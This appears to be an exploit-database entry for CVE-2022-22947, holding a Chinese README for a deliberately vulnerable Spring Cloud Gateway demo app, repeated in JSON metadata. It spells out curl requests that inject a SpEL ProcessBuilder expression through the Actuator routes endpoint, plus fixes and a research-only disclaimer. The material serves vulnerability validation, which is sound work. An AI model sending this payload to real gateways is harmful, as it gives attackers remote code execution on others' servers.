Exploit for Code Injection in Vmware Spring_Cloud_Gateway_F2E4B773-91F0-59FF-A88F-8896ED7892F1

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

# CVE-2022-22947 Spring Cloud Gateway 漏洞验证应用

这是一个专门用于演示和验证 CVE-2022-22947 漏洞的 Spring Cloud Gateway 应用。该应用程序使用了易受攻击的 Spring Cloud Gateway 版本，可以通过 Actuator 端点执行任意代码。

## 漏洞概述

CVE-2022-22947 是 Spring Cloud Gateway 中的一个远程代码执行漏洞。攻击者可以通过 Actuator 端点动态添加包含恶意 SpEL 表达式的路由来执行任意代码。

## 环境要求

- Java 11+
- Maven 3.6+
- macOS 系统（用于计算器演示）

## 启动应用

```bash
mvn spring-boot:run
```

应用将在 `http://localhost:8080` 上启动。

## 漏洞验证步骤

### 第一步：添加恶意路由

发送 POST 请求到 `/actuator/gateway/routes/test` 端点，添加包含恶意 SpEL 表达式的路由：

```bash
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
-H "Content-Type: application/json" \
-d '{
"id": "test",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
}
}
],
"uri": "http://example.com",
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/test"
}
}
]
}'
```

### 第二步：刷新路由

发送 POST 请求到 `/actuator/gateway/refresh` 端点来刷新路由：

```bash
curl -X POST http://localhost:8080/actuator/gateway/refresh
```

### 第三步：触发恶意代码

访问恶意路由来触发代码执行：

```bash
curl http://localhost:8080/test
```

### 预期结果

成功利用漏洞后，macOS 计算器应用程序将会启动。

## 关键请求信息

### 1. 添加恶意路由的请求

**端点**: `POST /actuator/gateway/routes/test`

**请求头**:
```
Content-Type: application/json
```

**请求体**:
```json
{
"id": "test",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
}
}
],
"uri": "http://example.com",
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/test"
}
}
]
}
```

### 2. 刷新路由的请求

**端点**: `POST /actuator/gateway/refresh`

### 3. 触发漏洞的请求

**端点**: `GET /test`

## 漏洞分析

该漏洞允许攻击者通过 Actuator 端点动态添加路由，并在路由过滤器中使用 SpEL 表达式执行任意代码。漏洞的核心在于 Spring Cloud Gateway 对路由配置中的 SpEL 表达式处理不当。

## 修复建议

1. 升级到 Spring Cloud Gateway 3.1.1+ 或 3.0.7+
2. 禁用 Actuator 端点或限制访问
3. 使用 Spring Security 保护 Actuator 端点

## 版本信息

- Spring Boot: 2.6.2
- Spring Cloud: 2021.0.0
- Spring Cloud Gateway: 3.1.0 (易受攻击版本)

## 注意事项

⚠️ **安全警告**: 此应用仅用于教育和安全研究目的。请勿在生产环境中使用或部署此应用。

⚠️ **法律声明**: 使用此应用进行漏洞测试时，请确保您有适当的授权。未经授权的测试可能违反法律法规。

Visit Original Source

Basic Information

ID F2E4B773-91F0-59FF-A88F-8896ED7892F1

Published Aug 8, 2025 at 08:40

Modified Aug 8, 2025 at 08:43

{
    "lastseen": "2025-08-13T08:36:42",
    "description": "# CVE-2022-22947 Spring Cloud Gateway \u6f0f\u6d1e\u9a8c\u8bc1\u5e94\u7528\n\n\u8fd9\u662f\u4e00\u4e2a\u4e13\u95e8\u7528\u4e8e\u6f14\u793a\u548c\u9a8c\u8bc1 CVE-2022-22947 \u6f0f\u6d1e\u7684 Spring Cloud Gateway \u5e94\u7528\u3002\u8be5\u5e94\u7528\u7a0b\u5e8f\u4f7f\u7528\u4e86\u6613\u53d7\u653b\u51fb\u7684 Spring Cloud Gateway \u7248\u672c\uff0c\u53ef\u4ee5\u901a\u8fc7 Actuator \u7aef\u70b9\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\n## \u6f0f\u6d1e\u6982\u8ff0\n\nCVE-2022-22947 \u662f Spring Cloud Gateway \u4e2d\u7684\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7 Actuator \u7aef\u70b9\u52a8\u6001\u6dfb\u52a0\u5305\u542b\u6076\u610f SpEL \u8868\u8fbe\u5f0f\u7684\u8def\u7531\u6765\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\n## \u73af\u5883\u8981\u6c42\n\n- Java 11+\n- Maven 3.6+\n- macOS \u7cfb\u7edf\uff08\u7528\u4e8e\u8ba1\u7b97\u5668\u6f14\u793a\uff09\n\n## \u542f\u52a8\u5e94\u7528\n\n```bash\nmvn spring-boot:run\n```\n\n\u5e94\u7528\u5c06\u5728 `http://localhost:8080` \u4e0a\u542f\u52a8\u3002\n\n## \u6f0f\u6d1e\u9a8c\u8bc1\u6b65\u9aa4\n\n### \u7b2c\u4e00\u6b65\uff1a\u6dfb\u52a0\u6076\u610f\u8def\u7531\n\n\u53d1\u9001 POST \u8bf7\u6c42\u5230 `/actuator/gateway/routes/test` \u7aef\u70b9\uff0c\u6dfb\u52a0\u5305\u542b\u6076\u610f SpEL \u8868\u8fbe\u5f0f\u7684\u8def\u7531\uff1a\n\n```bash\ncurl -X POST http://localhost:8080/actuator/gateway/routes/test \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"id\": \"test\",\n    \"filters\": [\n      {\n        \"name\": \"AddResponseHeader\",\n        \"args\": {\n          \"name\": \"Result\",\n          \"value\": \"#{new java.lang.ProcessBuilder(\\\"open\\\", \\\"-a\\\", \\\"Calculator\\\").start()}\"\n        }\n      }\n    ],\n    \"uri\": \"http://example.com\",\n    \"predicates\": [\n      {\n        \"name\": \"Path\",\n        \"args\": {\n          \"_genkey_0\": \"/test\"\n        }\n      }\n    ]\n  }'\n```\n\n### \u7b2c\u4e8c\u6b65\uff1a\u5237\u65b0\u8def\u7531\n\n\u53d1\u9001 POST \u8bf7\u6c42\u5230 `/actuator/gateway/refresh` \u7aef\u70b9\u6765\u5237\u65b0\u8def\u7531\uff1a\n\n```bash\ncurl -X POST http://localhost:8080/actuator/gateway/refresh\n```\n\n### \u7b2c\u4e09\u6b65\uff1a\u89e6\u53d1\u6076\u610f\u4ee3\u7801\n\n\u8bbf\u95ee\u6076\u610f\u8def\u7531\u6765\u89e6\u53d1\u4ee3\u7801\u6267\u884c\uff1a\n\n```bash\ncurl http://localhost:8080/test\n```\n\n### \u9884\u671f\u7ed3\u679c\n\n\u6210\u529f\u5229\u7528\u6f0f\u6d1e\u540e\uff0cmacOS \u8ba1\u7b97\u5668\u5e94\u7528\u7a0b\u5e8f\u5c06\u4f1a\u542f\u52a8\u3002\n\n## \u5173\u952e\u8bf7\u6c42\u4fe1\u606f\n\n### 1. \u6dfb\u52a0\u6076\u610f\u8def\u7531\u7684\u8bf7\u6c42\n\n**\u7aef\u70b9**: `POST /actuator/gateway/routes/test`\n\n**\u8bf7\u6c42\u5934**:\n```\nContent-Type: application/json\n```\n\n**\u8bf7\u6c42\u4f53**:\n```json\n{\n  \"id\": \"test\",\n  \"filters\": [\n    {\n      \"name\": \"AddResponseHeader\",\n      \"args\": {\n        \"name\": \"Result\",\n        \"value\": \"#{new java.lang.ProcessBuilder(\\\"open\\\", \\\"-a\\\", \\\"Calculator\\\").start()}\"\n      }\n    }\n  ],\n  \"uri\": \"http://example.com\",\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/test\"\n      }\n    }\n  ]\n}\n```\n\n### 2. \u5237\u65b0\u8def\u7531\u7684\u8bf7\u6c42\n\n**\u7aef\u70b9**: `POST /actuator/gateway/refresh`\n\n### 3. \u89e6\u53d1\u6f0f\u6d1e\u7684\u8bf7\u6c42\n\n**\u7aef\u70b9**: `GET /test`\n\n## \u6f0f\u6d1e\u5206\u6790\n\n\u8be5\u6f0f\u6d1e\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7 Actuator \u7aef\u70b9\u52a8\u6001\u6dfb\u52a0\u8def\u7531\uff0c\u5e76\u5728\u8def\u7531\u8fc7\u6ee4\u5668\u4e2d\u4f7f\u7528 SpEL \u8868\u8fbe\u5f0f\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u6f0f\u6d1e\u7684\u6838\u5fc3\u5728\u4e8e Spring Cloud Gateway \u5bf9\u8def\u7531\u914d\u7f6e\u4e2d\u7684 SpEL \u8868\u8fbe\u5f0f\u5904\u7406\u4e0d\u5f53\u3002\n\n## \u4fee\u590d\u5efa\u8bae\n\n1. \u5347\u7ea7\u5230 Spring Cloud Gateway 3.1.1+ \u6216 3.0.7+\n2. \u7981\u7528 Actuator \u7aef\u70b9\u6216\u9650\u5236\u8bbf\u95ee\n3. \u4f7f\u7528 Spring Security \u4fdd\u62a4 Actuator \u7aef\u70b9\n\n## \u7248\u672c\u4fe1\u606f\n\n- Spring Boot: 2.6.2\n- Spring Cloud: 2021.0.0\n- Spring Cloud Gateway: 3.1.0 (\u6613\u53d7\u653b\u51fb\u7248\u672c)\n\n## \u6ce8\u610f\u4e8b\u9879\n\n\u26a0\ufe0f **\u5b89\u5168\u8b66\u544a**: \u6b64\u5e94\u7528\u4ec5\u7528\u4e8e\u6559\u80b2\u548c\u5b89\u5168\u7814\u7a76\u76ee\u7684\u3002\u8bf7\u52ff\u5728\u751f\u4ea7\u73af\u5883\u4e2d\u4f7f\u7528\u6216\u90e8\u7f72\u6b64\u5e94\u7528\u3002\n\n\u26a0\ufe0f **\u6cd5\u5f8b\u58f0\u660e**: \u4f7f\u7528\u6b64\u5e94\u7528\u8fdb\u884c\u6f0f\u6d1e\u6d4b\u8bd5\u65f6\uff0c\u8bf7\u786e\u4fdd\u60a8\u6709\u9002\u5f53\u7684\u6388\u6743\u3002\u672a\u7ecf\u6388\u6743\u7684\u6d4b\u8bd5\u53ef\u80fd\u8fdd\u53cd\u6cd5\u5f8b\u6cd5\u89c4\u3002",
    "published": "2025-08-08T08:40:24",
    "modified": "2025-08-08T08:43:51",
    "type": "githubexploit",
    "title": "Exploit for Code Injection in Vmware Spring_Cloud_Gateway",
    "source": "",
    "references": "",
    "id": "F2E4B773-91F0-59FF-A88F-8896ED7892F1",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2022-22947"
    ],
    "sourceData": "",
    "sourceHref": "",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://github.com/skysliently/CVE-2022-22947-pb-ai",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

💭 Join the Security Discussion ❌ Cancel Reply